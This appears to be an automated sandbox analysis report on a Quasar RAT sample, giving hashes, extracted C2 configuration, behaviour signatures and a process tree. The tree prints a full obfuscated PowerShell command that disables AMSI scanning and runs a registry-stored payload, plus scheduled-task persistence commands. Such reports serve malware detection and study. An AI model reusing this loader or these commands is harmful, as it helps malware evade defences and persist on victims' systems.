Analysis

  • max time kernel
    10s
  • max time network
    12s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-04-2024 17:18

Errors

Reason
Machine shutdown: "{\"level\":\"info\",\"time\":\"2024-04-21T17:18:57Z\",\"message\":\"Dirty snapshot: /var/lib/sandbox/hatchvm/win10v2004-20240412-en/instance_30-dirty.qcow2\"}"

General

  • Target

    Update.exe

  • Size

    409KB

  • MD5

    93cd801b9e5e90edab480d3c1c135271

  • SHA1

    b0c7e918ade7a47916603ebd9eb1e3b4d78062c2

  • SHA256

    89996d761395b9e79589c4c7c93cc21ae2b5a00a9ba8c46abbf395954f3d0133

  • SHA512

    a5e207744fcb100fb24935ecda4c4214ac4cc7aca666b589fa1c451f1ad24c5a573cfe1b8150ac5510a866bb800251aa6ebf3fd685ed7a2e5fbc482791e143ed

  • SSDEEP

    6144:0rBUymyfpwzeiqv6Ef3RB17bdzjyue7zKINbuz2vcDJ8vtVQY:eBwz9/Ef3RB17FyuYKIQXDJ8vtCY

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

C2

147.185.221.19:33587

Mutex

$Sxr-zpFqsQjJJh3miBvVnu

Attributes
  • encryption_key

    w1TSUMSbvOFQ9whpYTwH

  • install_name

    BiosUpdX64YDPS.exe

  • log_directory

    $sxr

  • reconnect_delay

    3000

  • startup_key

    $sxr-mtsha

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:616
    • C:\Windows\system32\dwm.exe
      "dwm.exe"
      2⤵
        PID:316
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{a70efe72-3611-4f9b-b4d2-313e78c703b8}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1536
      • C:\Windows\system32\wlrmdr.exe
        -s -1 -f 2 -t Your PC will automatically restart in one minute -m Windows ran into a problem and needs to restart. You should close this message now and save your work. -a 3
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        PID:4428
    • C:\Windows\system32\lsass.exe
      C:\Windows\system32\lsass.exe
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:672
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
      1⤵
        PID:956
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
        1⤵
          PID:740
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
          1⤵
            PID:1032
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
            1⤵
              PID:1112
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1136
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                1⤵
                  PID:1148
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:wDtFuzSvdOeo{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$xSMTqDPkvEAjwa,[Parameter(Position=1)][Type]$VlhphQeeKs)$IyIKxMAuMbe=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+'e'+'c'+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+''+'M'+''+[Char](111)+'dul'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+'e'+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+','+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+'e'+'d'+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+'o'+'C'+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$IyIKxMAuMbe.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+'a'+''+[Char](108)+'N'+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$xSMTqDPkvEAjwa).SetImplementationFlags('R'+[Char](117)+''+'n'+''+'t'+'im'+[Char](101)+',M'+'a'+''+[Char](110)+''+'a'+'g'+[Char](101)+''+[Char](100)+'');$IyIKxMAuMbe.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+'k'+'e','Pu'+'b'+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+'i'+'d'+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$VlhphQeeKs,$xSMTqDPkvEAjwa).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+'e,M'+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'ed');Write-Output $IyIKxMAuMbe.CreateType();}$MPFiXlgiHbKGI=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+'.'+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+'o'+'s'+''+[Char](111)+''+[Char](102)+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+'v'+'eM'+[Char](101)+'t'+'h'+''+[Char](111)+'d'+'s'+'');$llbfNYtFLoVAjc=$MPFiXlgiHbKGI.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+'o'+'c'+''+[Char](65)+''+[Char](100)+''+'d'+''+'r'+'e'+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('Pu'+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$sIHzjhNyEwCcdlVZsQg=wDtFuzSvdOeo @([String])([IntPtr]);$uaCqDukvYaROtEBwhZnXwk=wDtFuzSvdOeo @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xujXBqkBZdg=$MPFiXlgiHbKGI.GetMethod('G'+[Char](101)+'t'+[Char](77)+''+'o'+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+'d'+'l'+[Char](108)+'')));$tcjrubqfzDJbNK=$llbfNYtFLoVAjc.Invoke($Null,@([Object]$xujXBqkBZdg,[Object](''+[Char](76)+'o'+[Char](97)+'dL'+[Char](105)+''+'b'+''+'r'+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$ZYJmEUVNJIUAiSOYQ=$llbfNYtFLoVAjc.Invoke($Null,@([Object]$xujXBqkBZdg,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+'a'+'l'+''+[Char](80)+''+[Char](114)+'ote'+'c'+''+'t'+'')));$JXEdXpl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tcjrubqfzDJbNK,$sIHzjhNyEwCcdlVZsQg).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$AavGhIluXUMFRxQWJ=$llbfNYtFLoVAjc.Invoke($Null,@([Object]$JXEdXpl,[Object]('Am'+'s'+'i'+'S'+''+'c'+''+[Char](97)+'nBuf'+'f'+''+'e'+''+[Char](114)+'')));$fppkfvgiIf=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZYJmEUVNJIUAiSOYQ,$uaCqDukvYaROtEBwhZnXwk).Invoke($AavGhIluXUMFRxQWJ,[uint32]8,4,[ref]$fppkfvgiIf);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AavGhIluXUMFRxQWJ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZYJmEUVNJIUAiSOYQ,$uaCqDukvYaROtEBwhZnXwk).Invoke($AavGhIluXUMFRxQWJ,[uint32]8,0x20,[ref]$fppkfvgiIf);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+'TWA'+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+'7'+[Char](115)+'ta'+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                    2⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • Drops file in System32 directory
                    • Suspicious use of SetThreadContext
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:2420
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                  1⤵
                    PID:1164
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                    1⤵
                      PID:1276
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                      1⤵
                        PID:1300
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1308
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                          1⤵
                            PID:1436
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1472
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                              1⤵
                                PID:1520
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                1⤵
                                  PID:1540
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                  1⤵
                                    PID:1636
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                    1⤵
                                      PID:1720
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                      1⤵
                                        PID:1756
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1764
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                          1⤵
                                            PID:1856
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                            1⤵
                                              PID:2000
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                              1⤵
                                                PID:2004
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:2016
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                  1⤵
                                                    PID:1008
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:1812
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      1⤵
                                                        PID:2124
                                                      • C:\Windows\sysmon.exe
                                                        C:\Windows\sysmon.exe
                                                        1⤵
                                                          PID:2820
                                                        • C:\Users\Admin\AppData\Local\Temp\Update.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\Update.exe"
                                                          1⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:3052
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            "schtasks" /create /tn "$sxr-mtsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Update.exe" /rl HIGHEST /f
                                                            2⤵
                                                            • Creates scheduled task(s)
                                                            PID:3232
                                                          • C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe
                                                            "C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of SetWindowsHookEx
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:4552
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              "schtasks" /create /tn "$sxr-mtsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe" /rl HIGHEST /f
                                                              3⤵
                                                              • Creates scheduled task(s)
                                                              PID:3732
                                                          • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:3728
                                                          • C:\Windows\SysWOW64\SCHTASKS.exe
                                                            "SCHTASKS.exe" /create /tn "$77Update.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Update.exe'" /sc onlogon /rl HIGHEST
                                                            2⤵
                                                            • Creates scheduled task(s)
                                                            PID:4072

                                                        Network

                                                        MITRE ATT&CK Matrix ATT&CK v13

                                                        Execution

                                                        Scheduled Task/Job

                                                        1
                                                        T1053

                                                        Persistence

                                                        Scheduled Task/Job

                                                        1
                                                        T1053

                                                        Privilege Escalation

                                                        Scheduled Task/Job

                                                        1
                                                        T1053

                                                        Command and Control

                                                        Web Service

                                                        1
                                                        T1102

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                          Filesize

                                                          162KB

                                                          MD5

                                                          152e3f07bbaf88fb8b097ba05a60df6e

                                                          SHA1

                                                          c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                          SHA256

                                                          a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                          SHA512

                                                          2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                        • C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe
                                                          Filesize

                                                          409KB

                                                          MD5

                                                          93cd801b9e5e90edab480d3c1c135271

                                                          SHA1

                                                          b0c7e918ade7a47916603ebd9eb1e3b4d78062c2

                                                          SHA256

                                                          89996d761395b9e79589c4c7c93cc21ae2b5a00a9ba8c46abbf395954f3d0133

                                                          SHA512

                                                          a5e207744fcb100fb24935ecda4c4214ac4cc7aca666b589fa1c451f1ad24c5a573cfe1b8150ac5510a866bb800251aa6ebf3fd685ed7a2e5fbc482791e143ed

                                                        • C:\Windows\Temp\__PSScriptPolicyTest_hznkg02d.bmj.ps1
                                                          Filesize

                                                          60B

                                                          MD5

                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                          SHA1

                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                          SHA256

                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                          SHA512

                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                        • memory/316-108-0x0000023F7EBA0000-0x0000023F7EBCB000-memory.dmp
                                                          Filesize

                                                          172KB

                                                        • memory/316-89-0x0000023F7EBA0000-0x0000023F7EBCB000-memory.dmp
                                                          Filesize

                                                          172KB

                                                        • memory/616-68-0x00007FF8D578D000-0x00007FF8D578E000-memory.dmp
                                                          Filesize

                                                          4KB

                                                        • memory/616-65-0x00007FF895770000-0x00007FF895780000-memory.dmp
                                                          Filesize

                                                          64KB

                                                        • memory/616-64-0x000002C5EC650000-0x000002C5EC67B000-memory.dmp
                                                          Filesize

                                                          172KB

                                                        • memory/616-56-0x000002C5EC650000-0x000002C5EC67B000-memory.dmp
                                                          Filesize

                                                          172KB

                                                        • memory/616-55-0x000002C5EC650000-0x000002C5EC67B000-memory.dmp
                                                          Filesize

                                                          172KB

                                                        • memory/616-54-0x000002C5EC620000-0x000002C5EC645000-memory.dmp
                                                          Filesize

                                                          148KB

                                                        • memory/672-79-0x00000154616A0000-0x00000154616CB000-memory.dmp
                                                          Filesize

                                                          172KB

                                                        • memory/672-82-0x00007FF8D578F000-0x00007FF8D5790000-memory.dmp
                                                          Filesize

                                                          4KB

                                                        • memory/672-70-0x00000154616A0000-0x00000154616CB000-memory.dmp
                                                          Filesize

                                                          172KB

                                                        • memory/672-81-0x00007FF895770000-0x00007FF895780000-memory.dmp
                                                          Filesize

                                                          64KB

                                                        • memory/740-128-0x00007FF895770000-0x00007FF895780000-memory.dmp
                                                          Filesize

                                                          64KB

                                                        • memory/956-83-0x0000025743FC0000-0x0000025743FEB000-memory.dmp
                                                          Filesize

                                                          172KB

                                                        • memory/956-101-0x0000025743FC0000-0x0000025743FEB000-memory.dmp
                                                          Filesize

                                                          172KB

                                                        • memory/956-103-0x00007FF895770000-0x00007FF895780000-memory.dmp
                                                          Filesize

                                                          64KB

                                                        • memory/956-107-0x00007FF8D578C000-0x00007FF8D578D000-memory.dmp
                                                          Filesize

                                                          4KB

                                                        • memory/1536-51-0x0000000140000000-0x0000000140008000-memory.dmp
                                                          Filesize

                                                          32KB

                                                        • memory/1536-43-0x0000000140000000-0x0000000140008000-memory.dmp
                                                          Filesize

                                                          32KB

                                                        • memory/1536-41-0x0000000140000000-0x0000000140008000-memory.dmp
                                                          Filesize

                                                          32KB

                                                        • memory/1536-40-0x0000000140000000-0x0000000140008000-memory.dmp
                                                          Filesize

                                                          32KB

                                                        • memory/1536-39-0x0000000140000000-0x0000000140008000-memory.dmp
                                                          Filesize

                                                          32KB

                                                        • memory/1536-47-0x0000000140000000-0x0000000140008000-memory.dmp
                                                          Filesize

                                                          32KB

                                                        • memory/1536-48-0x00007FF8D56F0000-0x00007FF8D58E5000-memory.dmp
                                                          Filesize

                                                          2.0MB

                                                        • memory/1536-49-0x00007FF8D3740000-0x00007FF8D37FE000-memory.dmp
                                                          Filesize

                                                          760KB

                                                        • memory/1540-382-0x00000233D7B70000-0x00000233D7B95000-memory.dmp
                                                          Filesize

                                                          148KB

                                                        • memory/1636-314-0x000001A216D90000-0x000001A216DB5000-memory.dmp
                                                          Filesize

                                                          148KB

                                                        • memory/1636-393-0x000001A216D90000-0x000001A216DB5000-memory.dmp
                                                          Filesize

                                                          148KB

                                                        • memory/2420-50-0x00007FF8B6580000-0x00007FF8B7041000-memory.dmp
                                                          Filesize

                                                          10.8MB

                                                        • memory/2420-36-0x0000024CFC680000-0x0000024CFC6AA000-memory.dmp
                                                          Filesize

                                                          168KB

                                                        • memory/2420-35-0x0000024CFA100000-0x0000024CFA110000-memory.dmp
                                                          Filesize

                                                          64KB

                                                        • memory/2420-34-0x0000024CFC350000-0x0000024CFC372000-memory.dmp
                                                          Filesize

                                                          136KB

                                                        • memory/2420-29-0x0000024CFA100000-0x0000024CFA110000-memory.dmp
                                                          Filesize

                                                          64KB

                                                        • memory/2420-28-0x00007FF8B6580000-0x00007FF8B7041000-memory.dmp
                                                          Filesize

                                                          10.8MB

                                                        • memory/2420-37-0x00007FF8D56F0000-0x00007FF8D58E5000-memory.dmp
                                                          Filesize

                                                          2.0MB

                                                        • memory/2420-38-0x00007FF8D3740000-0x00007FF8D37FE000-memory.dmp
                                                          Filesize

                                                          760KB

                                                        • memory/3052-7-0x0000000006820000-0x000000000685C000-memory.dmp
                                                          Filesize

                                                          240KB

                                                        • memory/3052-3-0x00000000055E0000-0x0000000005672000-memory.dmp
                                                          Filesize

                                                          584KB

                                                        • memory/3052-22-0x0000000074680000-0x0000000074E30000-memory.dmp
                                                          Filesize

                                                          7.7MB

                                                        • memory/3052-2-0x0000000005AF0000-0x0000000006094000-memory.dmp
                                                          Filesize

                                                          5.6MB

                                                        • memory/3052-4-0x0000000005720000-0x0000000005730000-memory.dmp
                                                          Filesize

                                                          64KB

                                                        • memory/3052-5-0x0000000005680000-0x00000000056E6000-memory.dmp
                                                          Filesize

                                                          408KB

                                                        • memory/3052-0-0x0000000000B60000-0x0000000000BCC000-memory.dmp
                                                          Filesize

                                                          432KB

                                                        • memory/3052-1-0x0000000074680000-0x0000000074E30000-memory.dmp
                                                          Filesize

                                                          7.7MB

                                                        • memory/3052-6-0x00000000062E0000-0x00000000062F2000-memory.dmp
                                                          Filesize

                                                          72KB

                                                        • memory/4428-202-0x00007FF8D56F0000-0x00007FF8D58E5000-memory.dmp
                                                          Filesize

                                                          2.0MB

                                                        • memory/4428-205-0x00007FF8D56F0000-0x00007FF8D58E5000-memory.dmp
                                                          Filesize

                                                          2.0MB

                                                        • memory/4552-104-0x0000000004AA0000-0x0000000004AB0000-memory.dmp
                                                          Filesize

                                                          64KB

                                                        • memory/4552-16-0x0000000006250000-0x000000000625A000-memory.dmp
                                                          Filesize

                                                          40KB

                                                        • memory/4552-13-0x0000000074680000-0x0000000074E30000-memory.dmp
                                                          Filesize

                                                          7.7MB

                                                        • memory/4552-14-0x0000000004AA0000-0x0000000004AB0000-memory.dmp
                                                          Filesize

                                                          64KB

                                                        • memory/4552-90-0x0000000074680000-0x0000000074E30000-memory.dmp
                                                          Filesize

                                                          7.7MB